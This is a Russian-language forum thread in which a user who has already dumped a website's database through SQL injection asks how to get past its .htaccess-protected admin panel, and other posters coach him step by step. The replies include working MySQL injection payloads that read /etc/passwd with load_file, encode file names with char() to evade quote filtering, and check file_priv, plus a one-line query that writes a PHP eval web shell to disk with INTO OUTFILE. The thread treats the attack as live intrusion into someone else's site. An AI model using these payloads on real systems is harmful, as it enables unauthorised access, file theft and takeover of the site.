Вопрос про авторизацию
 

Кароч хочу добраться до форума через сайт...
На самом сайте есть админка в которую можно попасть так: http://сайт/admin
Ну когда пытаюсь туда попасть выскакивает Окно для ввода имени и пароля... Сам сайт уязвим, пользуясь уязвимостью смог достать: название базы данных и всех её таблиц с ячейками ну и их значения... Но к сожалению админовской инфы там нет :(
Дак вот я в тупике как я могу воспользоваться тем что имею...

Как поискать скулю к базе данных админки, я так понял она хранится отдельно... Ведь когда пытаюсь зайти на страницу админки сразу окно типа алерта... :(

1. Для вопросов есть спец тема - постить нужно было туда, да и название темы "Растерялся... помогите.." не информативно, больше тем с таким именем не создавай.
2. "Окошко типа" алерта - это базовая авторизация, реализована она может быть, как с помощью файла .htaccess (в таком случае пароль будет храниться в файле указанном в .htaccess, как правило файл .htpasswd) - тут без читалки файлов не обойтись (если пользователь БД имеет права на чтения/запись файлов и права на чтения файлов выставлены так что их можно просматривать из БД, то сможешь просмотреть содержимое файлов, хотя тут лучше смотреть сорцы на наличие других уязвимостей), так и средствами php - в таком случае пароль может быть как в php файле, так и в БД.

Кстати проверить как реализована авторизация не сложно:

Если с помощью .htaccess, то тебе будет не доступна вся диретория: попробуй пройти по ссылке /admin/blablabla - есть окно для ввода логина и пароля появиться, то значит с помощью .htaccess, а если будет ошибка 404, то средствами php.

Как совет - проверь можешь ли ты читать файлы средствами БД.
Если нет, то ищи другие уязвимости, к примеру инклуд.

Предвидя глупый вопрос - нет, прочитать файл .htaccess, пройдя по ссылке /admin/.htaccess нельзя - он не доступен через веб.

Большущее спасибо. Очень доходчиво!!! Только у меня вопрос...
я вот ввел admin/index.php ну и словил окно, потом поменял на блоблобло :) и поймал опять окно... кароч .htaccess
Как быть в таком случае?

А как посмотреть можно ли читать файло средствами БД, тобишь я как бы читал в одной из статей и пробовал SIPT 4 но как бы... глухо... может какой-то конкретный пример?
Еще раз спасибо.

1. Для начала определись что за Ось - через скулю это не сложно сделать: @@version_compile_os или version() (обычно если винда, то функция version() вернёт версию с постфиксом -nt, к примеру 4.1-nt).
2. Далее попробуй прочитать один из файлов который должен быть доступным для чтения любым пользователем:

load_file('/etc/passwd') для юникс систем
load_file('c:/boot.ini') для винды

Если кавычки нельзя использовать, то конвертируй имя файла в хексы.

Можно ещё посмотреть в таблице mysql.user, права на чтения/запись файлов хранятся в колонке file_priv, но часто бывает, что права на чтения/запись файлов у пользователя БД есть, а на просмотр таблицы mysql.user нет.

3. Если права на чтения файлов есть, то:

- если кавычки не фильтруется, то можно залить шелл через sql запрос:

select '<?php eval($_GET[ev]) ?>' into outfile '/полный путь/shell.php'

- если фильтруются, то только чтение файлов, тут опять нужен полный путь до файла.

Полный путь можно найти в пхпинфо или из какой либо ошибки.

Если прав на работу с файлами у пользователя БД нет, то тут надо уже искать другие уязвимости.

1.Database Version: 5.0.32-Debian_7etch8-log

2.index.php?id=1+and+ascii(substring(load_file('/devic/index.php'),1,1))%3E64/* пробовал вот так... не покатило :( Ковычки в хексы он не превращает...

3. к сожалению инфу о привелегиях так и не нашел...
4. полный путь имеется ввиду /var/www/....???? Ну я брал путь из ошибки которая вылазит када кривая скуля идет... там он аккурат полный путь до файлега выдает...

может я не верно запрос оформил на чтение? и где искать инфу по правам доступа юзера БД. В information.schema нашел Views/security_type ... но она оттуда данные не отдает :(

Спасибо.

2 Я понять не могу ... у тебя там blind sql ? o_O

ковычки в хексы он и не превратит ... сам зачарь строчку и все дела....
load_file(char(47,101,116,99,47,112,97,115,115,119 ,100))
но в блайнде такое не проктит... но имха что то мне подсказывает что у тя не слепая скуля ... а ты сам написал какую то ерунду....

4. Именно .. это и есть полный путь ..

А что собственно не так? Читать файл можно и посимвольно, правда времени это займёт "немного" больше, чем обычно.

не помню в какой-то статье прочитал именно про лоад_файл... вот и пробовал побайтово...
сча попробую зачарить. отпишусь. Спасибо за подсказки.

Кароч к сожалению никак не катит :(
Сначала сам поексперементировал, потом спитом попробовал (он к слову прикольные запросы составляет, оч граммотные... либо мне ето тока кажеццо как нубу - автору респект)
Видимо не судьба... любопытную вещь заметил, чтобы не набрал после admin/... - выводилось окно, а как тока набрал admin/.htaccess пишет Forbidden.. может сюда как то скулю мона сунуть?

Нет, ищи другие уязвимости.